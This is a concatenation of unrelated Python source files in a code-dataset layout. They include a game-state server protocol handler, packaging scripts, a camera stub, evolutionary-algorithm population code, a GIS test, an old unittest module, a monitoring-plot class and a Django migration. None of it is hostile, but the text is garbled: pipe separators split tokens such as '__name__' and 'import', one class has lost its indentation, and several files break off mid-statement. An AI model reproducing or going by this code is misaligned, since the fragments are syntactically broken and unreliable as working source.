        """
        log.debug("Get._wait_for_release_lock start (%r, %r)", get_req.user_id, get_req.game)
        while True:
            log.debug("Get._wait_for_release_lock loop (%r, %r)", get_req.user_id, get_req.game)
            (version, req) = protocol.recv_message()
            if req.__class__ is ReleaseLock:
                # The release must match the locked get; anything else is a
                # protocol violation.
                if req.game != get_req.game:
                    raise UUSSProtocolException("ReleaseLock.game (%r) != GetRequest.game (%r)" % (req.game, get_req.game))
                if req.user_id != get_req.user_id:
                    raise UUSSProtocolException("ReleaseLock.user_id (%r) != GetRequest.user_id (%r)" % (req.user_id, get_req.user_id))
            # Any message received while waiting (including the ReleaseLock
            # itself) is processed and answered as in the normal server loop.
            with get_processor_for_message(req, version).get_response(protocol, req, config) as resp:
                protocol.send_message(resp, version)
            if req.__class__ is ReleaseLock:
                log.debug("Get._wait_for_release_lock end (%r, %r)", get_req.user_id, req.game)
                return
    def _build_response(self, state, chunked, game, user_id):
        """Wrap *state* in a GetResponse, chunking it first if needed."""
        if not chunked:
            # get the state in a chunked format for sending along the wire
            # there will be only a master chunk with no chunk config specified
            state = chunking.blow_chunks(state)
        resp = self.Response()
        resp.game = game
        resp.user_id = user_id
        if state is None:
            # Protobuf string fields cannot hold None; empty means "missing".
            resp.state = ""
        else:
            resp.state = state
        return resp
class Save(UUSSAction):
    """Persist a userstate blob and acknowledge with an empty SaveResponse."""

    def __init__(self):
        self.Request = SaveRequest
        self.Response = SaveResponse

    @contextlib.contextmanager
    def _call(self, protocol, userstate, req, config):
        """Write req.state for req.user_id, then yield an echo response."""
        log.debug("Save._call start (%r, %r)", req.user_id, req.game)
        userstate.save(req.user_id, req.state)
        response = self.Response()
        response.game = req.game
        response.user_id = req.user_id
        yield response
        log.debug("Save._call end (%r, %r)", req.user_id, req.game)
class Lock(UUSSAction):
    """Handle ReleaseLock messages; yields a LockReleased acknowledgement.

    No state is touched here: the actual lock release happens when the
    enclosing Get context exits.
    """

    def __init__(self):
        self.Request = ReleaseLock
        self.Response = LockReleased

    @contextlib.contextmanager
    def _call(self, protocol, userstate, req, config):
        log.debug("Lock._call start (%r, %r)", req.user_id, req.game)
        ack = self.Response()
        ack.game = req.game
        ack.user_id = req.user_id
        log.debug("Lock._call pre-yield (%r, %r)", req.user_id, req.game)
        yield ack
        log.debug("Lock._call post-yield (%r, %r)", req.user_id, req.game)
        log.debug("Lock._call end (%r, %r)", req.user_id, req.game)
class Delete(UUSSAction):
    """Delete a local userstate, logging its full contents first."""
    def __init__(self):
        self.Request = DeleteRequest
        self.Response = DeleteResponse
    @contextlib.contextmanager
    def _call(self, protocol, userstate, req, config):
        # Refuse to delete states owned by another shard: deletion is only
        # allowed for games served locally.
        if userstate.is_remote:
            raise UUSSProtocolException(
                "DeleteRequest sent for user_id %r game %r but that game is remote. I will only delete userstates in my local games."
                % (req.user_id, req.game))
        # Open with the lock held so the logged snapshot matches what is
        # actually deleted.
        with userstate.open(req.user_id, label='UUSS.Delete') as state:
            log.warn("[w:delete_userstate] Deleting userstate for user_id %r game %r, state follows\n%s", req.user_id, req.game, json.dumps(state))
            userstate.delete(req.user_id)
        resp = self.Response()
        resp.game = req.game
        resp.user_id = req.user_id
        yield resp
## UUMS protocol ##
class GetMessages(UUSSAction):
def __init__(self):
self.Request = GetMessagesRequest
self.Response = GetMessagesResponse
@contextlib.contextmanager
def _call(self, protocol, userstate, req, config):
log.debug("GetMessages._call start (%r, %r)", req.user_id, req.game)
resp = self.Response()
resp.game = req.game
resp.user_id = req.user_id
resp.messages.extend([ simplejson.dumps(m) for m in userstate.get_messages(req.user_id) ])
log.debug("GetMessages._call pre-yield (%r, %r)", req.user_id, req.game)
yield resp
log.debug("GetMessages._ca |
azon1272/War-for-cookies-v2 | game_window.py | Python | bsd-3-clause | 114 | 0.017544 | from lib.lib_game import Window
if __name_ | _ == '__main__':
a = Window('first | _map_for_test')
a.Run()
|
audiencepi/SimilarWeb-Python | setup.py | Python | mit | 1,247 | 0 | from setuptools import find_packages
from setuptools import setup
import io
import os
VERSION = '0.0.3'
def fpath(name):
    """Return *name* resolved relative to this setup script's directory."""
    here = os.path.dirname(__file__)
    return os.path.join(here, name)
def read(*filenames, **kwargs):
    """Concatenate the contents of *filenames* (paths relative to setup.py).

    Keyword arguments: ``encoding`` (default ``'utf-8'``) and ``sep``
    (default ``'\\n'``), the separator joined between file contents.
    """
    encoding = kwargs.get('encoding', 'utf-8')
    sep = kwargs.get('sep', '\n')
    chunks = []
    for filename in filenames:
        with io.open(fpath(filename), encoding=encoding) as handle:
            chunks.append(handle.read())
    return sep.join(chunks)
def get_requirements():
    """Return the requirement strings from requirements.txt, newline-stripped.

    Uses a ``with`` block so the file handle is closed deterministically
    (the original left it open until garbage collection).
    """
    with open(fpath('requirements.txt')) as req_file:
        return [line.rstrip('\n') for line in req_file]
# Package metadata passed to setuptools.setup(); kept in a dict so the
# module can be imported without side effects.
setup_args = dict(
    name='SimilarWeb-Python',
    description='Python Wrapper for SimilarWeb API',
    url='https://github.com/audiencepi/SimilarWeb-Python',
    version=VERSION,
    license='MIT',
    packages=find_packages(exclude=['tests']),
    include_package_data=True,
    install_requires=get_requirements(),
    author='Ryan Liao',
    author_email='pirsquare.ryan@gmail.com',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
    ],
)
if __name__ == '__main__':
    setup(**setup_args)
|
CoderBotOrg/coderbot | stub/picamera/camera.py | Python | gpl-2.0 | 113 | 0.00885 | from test.picamera_mock impor | t PiCameraMock as PiCamera
class array(object):
    """Stub standing in for the ``picamera.array`` attribute on CoderBot test rigs.

    The name mirrors the real picamera API, so it intentionally shadows the
    stdlib ``array`` module within this stub package.
    """
    def __init__(self):
        # Fixed typo: was ``def __init(self)``, which defined a dead method
        # and silently fell back to object.__init__.
        pass
|
mgraffg/RGP | EvoDAG/population.py | Python | apache-2.0 | 18,497 | 0.000378 | # Copyright 2015 Mario Graff Guerrero
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import numpy as np
from .node import Function, NaiveBayes, NaiveBayesMN, MultipleVariables, Centroid
from .model import Model
from .cython_utils import SelectNumbers
import gc
class Inputs(object):
    """Generates first-layer (input) nodes for the EvoDAG search.

    Wraps the choice among input-transformation function classes
    (NaiveBayes, NaiveBayesMN, MultipleVariables, Centroid by default) and
    remembers every generated node signature so duplicates are rejected.

    :param base: the EvoDAG instance; X, nvar, _ytr, _mask etc. are read
        from it.
    :param vars: pool of candidate variable indices
        (a SelectNumbers instance — presumably; confirm against caller).
    :param functions: optional list of at most 4 input-function classes.
    """
    def __init__(self, base, vars, functions=None):
        self._base = base
        self._vars = vars
        # Signatures of every node generated so far, for de-duplication.
        self._unique_individuals = set()
        if functions is None:
            self._funcs = [NaiveBayes, NaiveBayesMN, MultipleVariables, Centroid]
        else:
            self._funcs = functions
        assert len(self._funcs) <= 4
        c = base._classifier
        # Keep only the functions usable for the current task type; each
        # function class advertises classification/regression capability.
        tag = 'classification' if c else 'regression'
        self._funcs = [x for x in self._funcs if getattr(x, tag)]
        self.functions()
        # Index of the next function class to try in all_variables().
        self._all_variables_index = 0
    def use_all_variables(self):
        # True while the base is configured to emit all-variable input nodes
        # and there are still untried function classes.
        return self._base._use_all_vars_input_functions and self._base.nvar > 1 and self._all_variables_index < self._nfunc
    def all_variables(self):
        """Build one input node over *all* variables with the next function.

        Returns the node, or None when it is unfeasible (evaluation failed,
        non-finite output, or its fitness could not be set).
        """
        f = self._func[self._all_variables_index]
        self._all_variables_index += 1
        base = self._base
        unique_individuals = self._unique_individuals
        v = f([x for x in range(base.nvar)],
              ytr=base._ytr, naive_bayes=base.naive_bayes,
              finite=base._finite, mask=base._mask)
        sig = v.signature()
        unique_individuals.add(sig)
        v.height = 0
        if not v.eval(base.X):
            return None
        if not v.isfinite():
            return None
        if not base._bagging_fitness.set_fitness(v):
            return None
        return v
    def functions(self):
        """Select the usable function classes for the current inputs.

        When the average input density is below base._min_density, only
        density-safe functions are kept.  Sets self._func and self._nfunc.
        """
        base = self._base
        density = sum([x.hy.density for x in base.X]) / base.nvar
        # func = [x for x in self._funcs if x.nargs > 0]
        func = self._funcs
        if not len(func):
            self._func = None
            self._nfunc = 0
            return
        if density < self._base._min_density:
            func = [x for x in func if x.density_safe]
        self._nfunc = len(func)
        self._func = func
    def function(self):
        """Return the candidate functions in a randomized preference order.

        The first element is the preferred function; the probabilities are
        hard-coded per pool size (uniform first choice, rest as fallback).
        """
        if self._nfunc == 1:
            return self._func
        elif self._nfunc == 2:
            if np.random.random() < 0.5:
                return self._func
            return [self._func[1], self._func[0]]
        elif self._nfunc == 3:
            rnd = np.random.random()
            if rnd < 0.3:
                return self._func
            elif rnd < 0.6:
                return [self._func[1], self._func[0], self._func[2]]
            else:
                return [self._func[2], self._func[0], self._func[1]]
        else:
            func = [x for x in self._func]
            np.random.shuffle(func)
        return func
    def input(self):
        """Try to build a feasible, unique input node from the variable pool.

        Draws variable indices from the pool and tries each function class
        in the order given by function(); returns the first feasible unique
        node, or None when the pool is exhausted or all tries fail.
        """
        base = self._base
        unique_individuals = self._unique_individuals
        vars = self._vars
        if self._nfunc == 0:
            return None
        for _ in range(base._number_tries_feasible_ind):
            args = []
            func = self.function()
            for f in func:
                nargs = f.nargs
                if len(args):
                    # Return the previously drawn indices to the pool before
                    # drawing for the next function class.
                    vars.pos -= len(args)
                if vars.empty():
                    return None
                args = vars.get(nargs)
                if len(args) < f.min_nargs:
                    return None
                v = f(args,
                      ytr=base._ytr, naive_bayes=base.naive_bayes,
                      finite=base._finite, mask=base._mask)
                sig = v.signature()
                if sig in unique_individuals:
                    continue
                unique_individuals.add(sig)
                v.height = 0
                if not v.eval(base.X):
                    continue
                if not v.isfinite():
                    continue
                if not base._bagging_fitness.set_fitness(v):
                    continue
                return v
        return None
class BasePopulation(object):
    def __init__(self, base=None,
                 tournament_size=2,
                 classifier=True,
                 labels=None,
                 popsize=10000,
                 random_generations=0,
                 es_extra_test=lambda x: True,
                 negative_selection=True):
        """Hold the population state for an EvoDAG run.

        :param base: owning EvoDAG instance.
        :param tournament_size: individuals drawn per tournament selection.
        :param classifier: whether the task is classification.
        :param labels: class labels (classification only).
        :param popsize: target population size.
        :param random_generations: generations using random (non-tournament)
            selection.
        :param es_extra_test: extra predicate an individual must pass before
            it can become the early-stopping individual.
        :param negative_selection: whether to select victims by worst fitness.
        """
        self._base = base
        self._p = []               # current population
        self._hist = []            # every individual ever generated
        self._bsf = None           # best-so-far individual
        self._estopping = None     # early-stopping individual
        self._tournament_size = tournament_size
        self._index = None
        self._classifier = classifier
        self._es_extra_test = es_extra_test
        self._labels = labels
        self._logger = logging.getLogger('EvoDAG')
        self._previous_estopping = False
        self._current_popsize = 0
        self._popsize = popsize
        self._inds_replace = 0
        self.generation = 1
        self._random_generations = random_generations
        self._density = 0.0        # accumulated prediction density
        self._negative_selection = negative_selection
    @property
    def popsize(self):
        "Current number of individuals in the population"
        return self._current_popsize
    @property
    def population(self):
        "List containing the population"
        return self._p
    @population.setter
    def population(self, a):
        # Keep the cached size in sync with the assigned list.
        self._current_popsize = len(a)
        self._p = a
    @property
    def density(self):
        # Average density per individual; _density is presumably accumulated
        # as individuals are added (accumulation not visible in this chunk).
        return self._density / self.popsize
def get_density(self, v):
try:
return v.hy.density
except AttributeError:
return sum([x.density for x in v.hy]) / len(v.hy)
    @property
    def previous_estopping(self):
        """
        Returns whether the last individual set in the population was
        an early stopping individual
        """
        return self._previous_estopping
    @previous_estopping.setter
    def previous_estopping(self, v):
        self._previous_estopping = v
    @property
    def hist(self):
        "List containing all the individuals generated"
        return self._hist
    @property
    def bsf(self):
        "Best so far"
        return self._bsf
    @property
    def estopping(self):
        "Early stopping individual"
        return self._estopping
    @estopping.setter
    def estopping(self, v):
        # Setting is best-effort: v only replaces the current early-stopping
        # individual when it has a validation fitness, improves on the
        # incumbent, and passes the extra test.
        self.previous_estopping = False
        if v.fitness_vs is None:
            return None
        flag = False
        if self.estopping is None:
            if not self._es_extra_test(v):
                return None
            self._estopping = v
            flag = True
        elif v.fitness_vs > self.estopping.fitness_vs:
            if not self._es_extra_test(v):
                return None
            self._estopping = v
            flag = True
        if flag:
            self.previous_estopping = flag
            # A new early-stopping individual proves progress is feasible.
            self._base._unfeasible_counter = 0
            vfvs = v.fitness_vs
            self._logger.info('(%i) ES: %0.4f %0.4f' % (v.position,
                                                        v.fitness,
                                                        vfvs))
    @bsf.setter
    def bsf(self, v):
        # v replaces the best-so-far only when it strictly improves the
        # training fitness (or no incumbent exists yet).
        flag = False
        if self.bsf is None:
            self._bsf = v
            flag = True
        elif v.fitness > self.bsf.fitness:
            self._bsf = v
            flag = True
        if flag:
            if v.fitness_vs is None:
                fvs = ""
            else:
                fvs = "%0.4f" % v.fitness_vs
            fts = "%0.4f" % v.fitness
            self._logger.debug('(%(position)s) BSF: %(fts)s %(fvs)s',
                               {'fts': fts, 'fvs': fvs, 'position': v.position})
def model(self, v=None):
"Returns the model of node v"
if v is None:
|
wrobell/geocoon | geocoon/tests/test_sql.py | Python | gpl-3.0 | 1,771 | 0.000565 | #
# GeoCoon - GIS data analysis library based on Pandas and Shapely
#
# Copyright (C) 2014 by Artur | Wroblewski <wrobell@pld-linux.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either versio | n 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from shapely.geometry import Point
from geocoon.sql import read_sql
from geocoon.core import GeoDataFrame, PointSeries
import unittest
from unittest import mock
class SQLTestCase(unittest.TestCase):
    """
    Test SQL GeoCoon SQL routines.
    """
    @mock.patch('pandas.io.sql.read_sql')
    def test_read_sql(self, sql_mock):
        """
        Test SQL data frame read
        """
        wkb_blobs = [Point(v, v).wkb for v in (1, 2, 3)]
        frame = GeoDataFrame({
            'a': PointSeries(wkb_blobs),
            'b': list(range(3)),
        })
        sql_mock.return_value = frame[['a', 'b']]
        result = read_sql('query', 'con', geom_col='a')
        self.assertEqual(PointSeries, type(result.a))
        self.assertEqual(Point, type(result.a[0]))
        self.assertEqual(3, len(result.index))
        self.assertTrue(all([1, 2, 3] == result.a.x))
        self.assertTrue(all([1, 2, 3] == result.a.y))
# vim: sw=4:et:ai
|
ai-ku/langvis | jython-2.1/Lib/unittest.py | Python | mit | 25,555 | 0.002465 | #!/usr/bin/env python
'''
Python unit testing framework, based on Erich Gamma's JUnit and Kent Beck's
Smalltalk testing framework.
This module contains the core framework classes that form the basis of
specific test cases and suites (TestCase, TestSuite etc.), and also a
text-based utility class for running the tests and reporting the results
(TextTestRunner).
Simple usage:
import unittest
class IntegerArithmenticTestCase(unittest.TestCase):
def testAdd(self): ## test method names begin 'test*'
self.assertEquals((1 + 2), 3)
self.assertEquals(0 + 1, 1)
def testMultiply(self);
self.assertEquals((0 * 10), 0)
self.assertEquals((5 * 8), 40)
if __name__ == '__main__':
unittest.main()
Further information is available in the bundled documentation, and from
http://pyunit.sourceforge.net/
Copyright (c) 1999, 2000, 2001 Steve Purcell
This module is free software, and you may redistribute it and/or modify
it under the same terms as Python itself, so long as this copyright message
and disclaimer are retained in their original form.
IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
'''
__author__ = "Steve Purcell"
__email__ = "stephen_purcell at yahoo dot com"
__version__ = "$Revision: 1.7 $"[11:-2]
import time
import sys
import traceback
import string
import os
import types
##############################################################################
# Test framework core
##############################################################################
class TestResult:
    """Collects the outcomes of a test run.

    Instances are driven by the TestCase and TestSuite classes; test
    authors rarely manipulate them directly.  A result tracks how many
    tests ran plus two lists of (testcase, exc_info) pairs — one for
    errors, one for failures — where exc_info is a sys.exc_info() tuple.
    """

    def __init__(self):
        self.testsRun = 0
        self.failures = []
        self.errors = []
        self.shouldStop = 0

    def startTest(self, test):
        "Called when the given test is about to be run"
        self.testsRun = self.testsRun + 1

    def stopTest(self, test):
        "Called when the given test has been run"
        pass

    def addError(self, test, err):
        "Called when an error has occurred"
        self.errors.append((test, err))

    def addFailure(self, test, err):
        "Called when a failure has occurred"
        self.failures.append((test, err))

    def addSuccess(self, test):
        "Called when a test has completed successfully"
        pass

    def wasSuccessful(self):
        "Tells whether or not this result was a success"
        return not (self.failures or self.errors)

    def stop(self):
        "Indicates that the tests should be aborted"
        self.shouldStop = 1

    def __repr__(self):
        return "<%s run=%i errors=%i failures=%i>" % \
               (self.__class__, self.testsRun, len(self.errors),
                len(self.failures))
class TestCase:
"""A class whose instances are single test cases.
By default, the test code itself should be placed in a method named
'runTest'.
If the fixture may be used for many test cases, create as
many test methods as are needed. When instantiating such a TestCase
subclass, specify in the constructor arguments the name of the test method
that the instance is to execute.
Test authors should subclass TestCase for their own tests. Construction
and deconstruction of the test's environment ('fixture') can be
implemented by overriding the 'setUp' and 'tearDown' methods respectively.
If it is necessary to override the __init__ method, the base class
__init__ method must always be called. It is important that subclasses
should not change the signature of their __init__ method, since instances
of the classes are instantiated automatically by parts of the framework
in order to be run.
"""
# This attribute determines which exception will be raised when
# the instance's assertion methods fail; test methods raising this
# exception will be deemed to have 'failed' rather than 'errored'
failureException = AssertionError
    def __init__(self, methodName='runTest'):
        """Create an instance of the class that will use the named test
           method when executed. Raises a ValueError if the instance does
           not have a method with the specified name.
        """
        try:
            # Double-underscore attributes are name-mangled to
            # _TestCase__testMethodName etc.; private to this class.
            self.__testMethodName = methodName
            testMethod = getattr(self, methodName)
            self.__testMethodDoc = testMethod.__doc__
        except AttributeError:
            # Python 2 / Jython raise syntax — this module targets Jython 2.1.
            raise ValueError, "no such test method in %s: %s" % \
                  (self.__class__, methodName)
    def setUp(self):
        "Hook method for setting up the test fixture before exercising it."
        pass
    def tearDown(self):
        "Hook method for deconstructing the test fixture after testing it."
        pass
    def countTestCases(self):
        # A TestCase always represents exactly one test.
        return 1
    def defaultTestResult(self):
        # Result object used when run()/__call__ is given none.
        return TestResult()
    def shortDescription(self):
        """Returns a one-line description of the test, or None if no
        description has been provided.
        The default implementation of this method returns the first line of
        the specified test method's docstring.
        """
        doc = self.__testMethodDoc
        return doc and string.strip(string.split(doc, "\n")[0]) or None
    def id(self):
        # Unique identifier: "<class> .<method name>".
        return "%s.%s" % (self.__class__, self.__testMethodName)
    def __str__(self):
        return "%s (%s)" % (self.__testMethodName, self.__class__)
    def __repr__(self):
        return "<%s testMethod=%s>" % \
               (self.__class__, self.__testMethodName)
    def run(self, result=None):
        # Alias for calling the instance directly.
        return self(result)
    def __call__(self, result=None):
        """Run the test, recording the outcome in *result*.

        setUp/tearDown errors count as errors; failureException counts as
        a failure; any other exception from the test method is an error.
        addSuccess is only reported when all three phases succeeded.
        """
        if result is None: result = self.defaultTestResult()
        result.startTest(self)
        testMethod = getattr(self, self.__testMethodName)
        try:
            try:
                self.setUp()
            except:
                # setUp failed: record and skip the test method entirely.
                result.addError(self,self.__exc_info())
                return
            ok = 0
            try:
                testMethod()
                ok = 1
            except self.failureException, e:
                result.addFailure(self,self.__exc_info())
            except:
                result.addError(self,self.__exc_info())
            try:
                self.tearDown()
            except:
                # tearDown failure downgrades an otherwise passing test.
                result.addError(self,self.__exc_info())
                ok = 0
            if ok: result.addSuccess(self)
        finally:
            result.stopTest(self)
    def debug(self):
        """Run the test without collecting errors in a TestResult"""
        # Exceptions propagate to the caller, which is what makes this
        # useful under a debugger.
        self.setUp()
        getattr(self, self.__testMethodName)()
        self.tearDown()
def __exc_info(self):
"""Return a version of sys.exc_info() with the traceback frame
minimised; usually the top level of the traceback frame is not
needed.
"""
exctype, excvalue, tb = sys.exc_info()
if sys.platform[:4] == 'java': ## tracebacks look different in Jython
return (exct |
OpenTouch/python-facette | src/facette/v1/plot.py | Python | apache-2.0 | 2,559 | 0.008988 | # Copyright (c) 2014 Alcatel-Lucent Enterprise
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from facette.utils import *
from facette.v1.plotserie import PlotSerie
import json
# JSON field names used by the Facette /plots API payloads.
PLOT_ID = "id"
PLOT_NAME = "name"
PLOT_DESCRIPTION = "description"
PLOT_TYPE = "type"
PLOT_SERIES = "series"
PLOT_STACK_MODE = "stack_mode"
PLOT_START = "start"
PLOT_END = "end"
PLOT_STEP = "step"
PLOT_MODIFIED = "modified"
PLOT_UNIT_LABEL = "unit_label"
PLOT_UNIT_TYPE = "unit_type"
# Graph rendering types (values defined by the Facette API).
GRAPH_TYPE_AREA = 1
GRAPH_TYPE_LINE = 2
# Serie stacking modes (values defined by the Facette API).
STACK_MODE_NONE = 1
STACK_MODE_NORMAL = 2
STACK_MODE_PERCENT = 3
class Plot:
    """A Facette plot: scalar fields plus a list of PlotSerie children.

    Each scalar field is pulled from *js* via facette_to_json, which also
    mirrors it into self.plot so __str__ can serialize the whole object.
    """
    def __init__(self, js=""):
        self.plot = {}
        # Field extraction order matches the API payload layout.
        for attr, key in (('id', PLOT_ID),
                          ('name', PLOT_NAME),
                          ('description', PLOT_DESCRIPTION),
                          ('type', PLOT_TYPE),
                          ('stack_mode', PLOT_STACK_MODE),
                          ('start', PLOT_START),
                          ('end', PLOT_END),
                          ('step', PLOT_STEP),
                          ('modified', PLOT_MODIFIED),
                          ('unit_label', PLOT_UNIT_LABEL),
                          ('unit_type', PLOT_UNIT_TYPE)):
            setattr(self, attr, facette_to_json(key, js, self.plot))
        if js.get(PLOT_SERIES):
            self.series = [PlotSerie(x) for x in js[PLOT_SERIES]]
        else:
            self.series = []
        self.plot[PLOT_SERIES] = self.series
    def __str__(self):
        js = self.plot
        js[PLOT_SERIES] = [json.loads(str(s)) for s in self.series]
        return json.dumps(js)
    def __repr__(self):
        return str(self)
|
cloudbase/maas | src/maasserver/migrations/0033_component_error.py | Python | agpl-3.0 | 15,078 | 0.007494 | # -*- coding: utf-8 -*-
import datetime
from django.db import models
from south.db import db
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Create the maasserver_componenterror table (South migration)."""
        # Adding model 'ComponentError'
        db.create_table(u'maasserver_componenterror', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('component', self.gf('django.db.models.fields.CharField')(unique=True, max_length=40)),
            ('error', self.gf('django.db.models.fields.CharField')(max_length=1000)),
        ))
        db.send_create_signal(u'maasserver', ['ComponentError'])
    def backwards(self, orm):
        """Reverse the migration by dropping the table."""
        # Deleting model 'ComponentError'
        db.delete_table(u'maasserver_componenterror')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'maasserver.bootimage': {
'Meta': {'unique_together': "((u'architecture', u'subarchitecture', u'release', u'purpose'),)", 'object_name': 'BootImage'},
'architecture': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'purpose': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'release': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'subarchitecture': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'maasserver.componenterror': {
'Meta': {'object_name': 'ComponentError'},
'component': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'error': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'maasserver.config': {
'Meta': {'object_name': 'Config'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('maasserver.fields.JSONObjectField', [], { | 'null': 'True'})
},
u'maasserver.dhcplease': {
'Meta': {'object_name': 'DHCPLease'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': | 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'unique': 'True', 'max_length': '15'}),
'mac': ('maasserver.fields.MACAddressField', [], {}),
'nodegroup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['maasserver.NodeGroup']"})
},
u'maasserver.filestorage': {
'Meta': {'object_name': 'FileStorage'},
'data': ('django.db.models.fields.files.FileField', [], {'max_length': '255'}),
'filename': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'maasserver.macaddress': {
'Meta': {'object_name': 'MACAddress'},
'created': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mac_address': ('maasserver.fields.MACAddressField', [], {'unique': 'True'}),
'node': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['maasserver.Node']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {})
},
u'maasserver.node': {
'Meta': {'object_name': 'Node'},
'after_commissioning_action': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'architecture': ('django.db.models.fields.CharField', [], {'default': "u'i386/generic'", 'max_length': '31'}),
'cpu_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {}),
'distro_series': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'error': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255', 'blank': 'True'}),
'hardware_details': ('maasserver.fields.XMLField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'memory': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'netboot': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
